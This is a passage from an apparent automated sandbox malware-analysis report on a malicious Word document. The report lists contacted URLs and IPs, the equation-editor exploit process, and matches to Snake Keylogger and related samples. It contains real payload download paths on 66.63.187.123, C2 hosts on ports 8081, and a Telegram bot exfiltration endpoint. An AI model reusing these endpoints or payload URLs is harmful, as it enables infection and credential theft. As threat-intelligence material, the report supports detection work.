                                                      http://ocsp.entrust.net0Dmillitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namemillitingacy20306.exe, 0000000A.00000002.436028498.0000000002200000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000023B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://reallyfreegeoip.org/xml/millitingacy20306.exe, 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002454000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://crl.entrust.net/server1.crl0millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&imillitingacy20306.exe, 0000000D.00000002.951853308.0000000003512000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            http://66.63.187.123/txt/H363BpKqz0MdVd7.exettC:EQNEDT32.EXE, 00000009.00000002.423390296.000000000065F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=millitingacy20306.exe, 0000000D.00000002.951411962.0000000002688000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002647000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.000000000342B000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002675000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002634000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003477000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://checkip.dyndns.orgmillitingacy20306.exe, 0000000D.00000002.951411962.000000000255C000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002493000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000024E8000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000024F5000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002505000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002454000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002442000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000253C000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002520000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002512000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000254E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchmillitingacy20306.exe, 0000000D.00000002.951411962.0000000002688000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002647000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.000000000342B000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002675000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002634000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003477000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://api.telegram.org/bot/sendMessage?chat_id=&text=millitingacy20306.exe, 0000000D.00000002.951411962.000000000256A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://www.google.com/favicon.icomillitingacy20306.exe, 0000000D.00000002.951411962.0000000002634000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003477000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    http://aborters.duckdns.org:8081millitingacy20306.exe, 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000023B1000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmptrue
                                                                    • URL Reputation: malware
                                                                    		unknown
                                                                    https://ac.ecosia.org/autocomplete?q=millitingacy20306.exe, 0000000D.00000002.951411962.0000000002688000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002647000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.000000000342B000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002675000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002634000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003477000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://crl.pkioverheid.nl/DomOvLatestCRL.crl0millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      http://66.63.187.123/txt/H363BpKqz0MdVd7.exejEQNEDT32.EXE, 00000009.00000002.423390296.000000000065F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://www.google.com/sorry/indexmillitingacy20306.exe, 0000000D.00000002.951411962.0000000002688000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003527000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003502000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.00000000034CD000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003581000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.00000000035DB000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.00000000035B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          http://66.63.187.123/txt/txt on 66.63.187.123.url.0.drtrue
                                                                            		unknown
                                                                            http://anotherarmy.dns.army:8081millitingacy20306.exe, 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000023B1000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmptrue
                                                                            • URL Reputation: malware
                                                                            		unknown
                                                                            https://reallyfreegeoip.orgmillitingacy20306.exe, 0000000D.00000002.951411962.000000000255C000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002493000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000024E8000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000024F5000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002505000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002454000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000253C000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002512000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000254E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26amillitingacy20306.exe, 0000000D.00000002.951853308.0000000003512000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://www.google.com/search?q=netmillitingacy20306.exe, 0000000D.00000002.951853308.0000000003512000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://www.google.com/sorry/indextestmillitingacy20306.exe, 0000000D.00000002.951853308.000000000356C000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.00000000034DA000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.00000000034B8000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.000000000358E000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.00000000035C6000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003512000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  http://api.telegram.orgmillitingacy20306.exe, 0000000D.00000002.951411962.000000000256A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://secure.comodo.com/CPS0millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=millitingacy20306.exe, 0000000D.00000002.951411962.0000000002688000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002647000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.000000000342B000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002675000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002634000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003477000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      http://crl.entrust.net/2048ca.crl0millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=millitingacy20306.exe, 0000000D.00000002.951411962.0000000002688000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002647000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.000000000342B000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002675000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002634000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003477000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedmillitingacy20306.exe, 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown

                                                                                        World Map of Contacted IPs

                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs

                                                                                        Public IPs

                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        149.154.167.220
                                                                                        		api.telegram.orgUnited Kingdom
                                                                                        		62041TELEGRAMRUtrue
                                                                                        188.114.97.3
                                                                                        		unknownEuropean Union
                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                        66.63.187.123
                                                                                        		unknownUnited States
                                                                                        		8100ASN-QUADRANET-GLOBALUStrue
                                                                                        193.122.6.168
                                                                                        		unknownUnited States
                                                                                        		31898ORACLE-BMC-31898USfalse
                                                                                        188.114.96.3
                                                                                        		reallyfreegeoip.orgEuropean Union
                                                                                        		13335CLOUDFLARENETUStrue
                                                                                        193.122.130.0
                                                                                        		unknownUnited States
                                                                                        		31898ORACLE-BMC-31898USfalse
                                                                                        158.101.44.242
                                                                                        		checkip.dyndns.comUnited States
                                                                                        		31898ORACLE-BMC-31898USfalse
                                                                                        132.226.247.73
                                                                                        		unknownUnited States
                                                                                        		16989UTMEMUSfalse

                                                                                        General Information

                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1520577
                                                                                        Start date and time:2024-09-27 15:59:11 +02:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 10m 6s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                        Number of analysed new started processes analysed:16
                                                                                        Number of new started drivers analysed:1
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:0225139776.docx.doc
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.spyw.expl.evad.winDOC@8/22@28/8
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 33.3%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 92%
                                                                                        • Number of executed functions: 102
                                                                                        • Number of non-executed functions: 118
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .doc
                                                                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                        • Attach to Office via COM
                                                                                        • Scroll down
                                                                                        • Close Viewer
                                                                                        • Override analysis time to 78898.3315037088 for current running targets taking high CPU consumption
                                                                                        • Override analysis time to 157796.663007418 for current running targets taking high CPU consumption

                                                                                        Warnings

                                                                                        • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe, conhost.exe
                                                                                        • Execution Graph export aborted for target EQNEDT32.EXE, PID 3772 because there are no executed function
                                                                                        • Execution Graph export aborted for target millitingacy20306.exe, PID 3952 because it is empty
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        • VT rate limit hit for: 0225139776.docx.doc

                                                                                        Simulations

                                                                                        Behavior and APIs

                                                                                        TimeTypeDescription
                                                                                        10:00:36API Interceptor63x Sleep call for process: EQNEDT32.EXE modified
                                                                                        10:00:38API Interceptor8134360x Sleep call for process: millitingacy20306.exe modified
                                                                                        10:00:41API Interceptor41x Sleep call for process: powershell.exe modified

                                                                                        Joe Sandbox View / Context

                                                                                        IPs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        149.154.167.220.05.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          GfGxum1sf3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            GfGxum1sf3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                #docs_8299010377388200191-pdf.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  Dekont.rar.xlxs.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    VL1xZpPp1I.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                      z64BLPL.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        TLS20242025.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          VbcXXnmIwPPhh.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            188.114.97.39q24V7OSys.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.kzeconomy.top/bopi/?-Z_XO=6kwaqb6m5omublBEUG6Q6qPKP5yOZjcuHwr6+9T02/Tvpmf8nJuTPpmClij6fvBBwm3b&zxltAx=RdCtqlAhlNvlRVfP
                                                                                                            QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • filetransfer.io/data-package/mfctuvFf/download
                                                                                                            http://brawllstars.ru/Get hashmaliciousHTMLPhisherBrowse
                                                                                                            • brawllstars.ru/
                                                                                                            http://aktiivasi-paylaterr.from-resmi.com/Get hashmaliciousUnknownBrowse
                                                                                                            • aktiivasi-paylaterr.from-resmi.com/
                                                                                                            ECChG5eWfZ.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • homker11.uebki.one/GeneratorTest.php
                                                                                                            HpCQgSai4e.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.zhxgtlw.top/bopi/?XtEdZRAP=tIrAt1o0vWdNGbj/SzADcCGpASEIYc8Vm+jYIgWXaQC1p/Id9tI9XA8Ni4J3RpZHG8N5&8p=DXgPYZ
                                                                                                            QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • filetransfer.io/data-package/Ky4pZ0WB/download
                                                                                                            ADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.1win-moldovia.fun/1g7m/
                                                                                                            http://www.tiktok758.com/Get hashmaliciousUnknownBrowse
                                                                                                            • www.tiktok758.com/img/logo.4c830710.svg
                                                                                                            TRmSF36qQG.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.zhxgtlw.top/bopi/?0T5=UL08qvZHLtV&EnAHS=tIrAt1o0vWdNGbj/SzADcCGpASEIYc8Vm+jYIgWXaQC1p/Id9tI9XA8Ni4JOdI1EXss+
                                                                                                            66.63.187.123Faktura 5643734_10.docGet hashmaliciousUnknownBrowse
                                                                                                            • 66.63.187.123/txt/h0Seehcs2jwmma5.exe
                                                                                                            Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 66.63.187.123/txt/HgCppsoKmxQq.exe
                                                                                                            Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 66.63.187.123/txt/XcsQpLjhNNvxYtrw.exe
                                                                                                            Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 66.63.187.123/txt/LLnsOpxxAnmWi.exe
                                                                                                            Sept order.docGet hashmaliciousFormBookBrowse
                                                                                                            • 66.63.187.123/txt/ISbNwOPLmmBZ.exe
                                                                                                            Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 66.63.187.123/txt/VbcXXnmIwPPhh.exe
                                                                                                            34467890.docGet hashmaliciousUnknownBrowse
                                                                                                            • 66.63.187.123/txt/JUoFDkavfHoJaP6.exe
                                                                                                            Swift.docGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 66.63.187.123/txt/xBneIooWzQjjOOg.exe
                                                                                                            BANK PAYMENT COPY.docGet hashmaliciousXWormBrowse
                                                                                                            • 66.63.187.123/txt/vnobizxc.exe
                                                                                                            11062370MXQRQ353000718_001.docGet hashmaliciousUnknownBrowse
                                                                                                            • 66.63.187.123/txt/YfDmHKYon6kpgkM.exe

                                                                                                            Domains

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            reallyfreegeoip.orgSecuriteInfo.com.Trojan.AutoIt.1503.25057.26595.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 188.114.96.3
                                                                                                            update SOA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 188.114.97.3
                                                                                                            .05.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 188.114.96.3
                                                                                                            GfGxum1sf3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 188.114.97.3
                                                                                                            GEsD6lobvy.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                                                                            • 188.114.97.3
                                                                                                            GfGxum1sf3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 188.114.96.3
                                                                                                            1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 188.114.97.3
                                                                                                            Payment Advice.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 188.114.96.3
                                                                                                            Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 188.114.97.3
                                                                                                            #docs_8299010377388200191-pdf.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 188.114.97.3
                                                                                                            checkip.dyndns.comnew shipment.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 132.226.8.169
                                                                                                            SecuriteInfo.com.Trojan.AutoIt.1503.25057.26595.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 193.122.130.0
                                                                                                            update SOA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 132.226.8.169
                                                                                                            .05.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 193.122.130.0
                                                                                                            GfGxum1sf3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 132.226.8.169
                                                                                                            GEsD6lobvy.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                                                                            • 132.226.8.169
                                                                                                            GfGxum1sf3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 158.101.44.242
                                                                                                            1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 158.101.44.242
                                                                                                            Payment Advice.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 132.226.247.73
                                                                                                            Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 193.122.130.0
                                                                                                            api.telegram.org.05.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            GfGxum1sf3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            GfGxum1sf3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            #docs_8299010377388200191-pdf.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Dekont.rar.xlxs.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            VL1xZpPp1I.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            z64BLPL.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            TLS20242025.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            VbcXXnmIwPPhh.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220

                                                                                                            ASNs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            ORACLE-BMC-31898UShttps://clicktracking.yellowbook.com/trackingenginewebapp/tracking.html?MB_ID=256862&SE_ID=9&AG_ID=2952701&AD_ID=6851395&kw=restaurants%20near%20me&kw_type=p&C_ID=874339&SE_AD_ID=73873744870314&se_clk_id=0651300f23401ca1b2e355991fb49377&hibu_site=0&redirect_url=https://femalewhowork.sa.com/rUswT/Get hashmaliciousHTMLPhisherBrowse
                                                                                                            • 192.29.61.248
                                                                                                            SecuriteInfo.com.Trojan.AutoIt.1503.25057.26595.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 193.122.130.0
                                                                                                            .05.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 193.122.130.0
                                                                                                            GfGxum1sf3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 158.101.44.242
                                                                                                            1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 158.101.44.242
                                                                                                            Payment Advice.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 158.101.44.242
                                                                                                            Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 193.122.130.0
                                                                                                            Dekont.rar.xlxs.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 158.101.44.242
                                                                                                            dekont.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 158.101.44.242
                                                                                                            Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 193.122.130.0
                                                                                                            TELEGRAMRU.05.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            GfGxum1sf3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            GfGxum1sf3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            #docs_8299010377388200191-pdf.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Dekont.rar.xlxs.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            http://brawllstars.ru/Get hashmaliciousHTMLPhisherBrowse
                                                                                                            • 149.154.167.99
                                                                                                            https://telagremn.com/Get hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.99
                                                                                                            http://tg.hispa-net.com/Get hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.99
                                                                                                            http://www.traderstv.net/Get hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.99
                                                                                                            CLOUDFLARENETUShttps://changeofscene.ladesk.com/605425-Secure-Business-DocumenGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 104.17.24.14
                                                                                                            https://careeligibility.vercel.app/chubedanGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 172.67.75.166
                                                                                                            https://clicktracking.yellowbook.com/trackingenginewebapp/tracking.html?MB_ID=256862&SE_ID=9&AG_ID=2952701&AD_ID=6851395&kw=restaurants%20near%20me&kw_type=p&C_ID=874339&SE_AD_ID=73873744870314&se_clk_id=0651300f23401ca1b2e355991fb49377&hibu_site=0&redirect_url=https://femalewhowork.sa.com/rUswT/Get hashmaliciousHTMLPhisherBrowse
                                                                                                            • 104.17.25.14
                                                                                                            https://lkk6m.conownsup.com/tpgbE/Get hashmaliciousHTMLPhisherBrowse
                                                                                                            • 104.17.25.14
                                                                                                            SecuriteInfo.com.Trojan.AutoIt.1503.25057.26595.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 188.114.96.3
                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 172.67.140.92
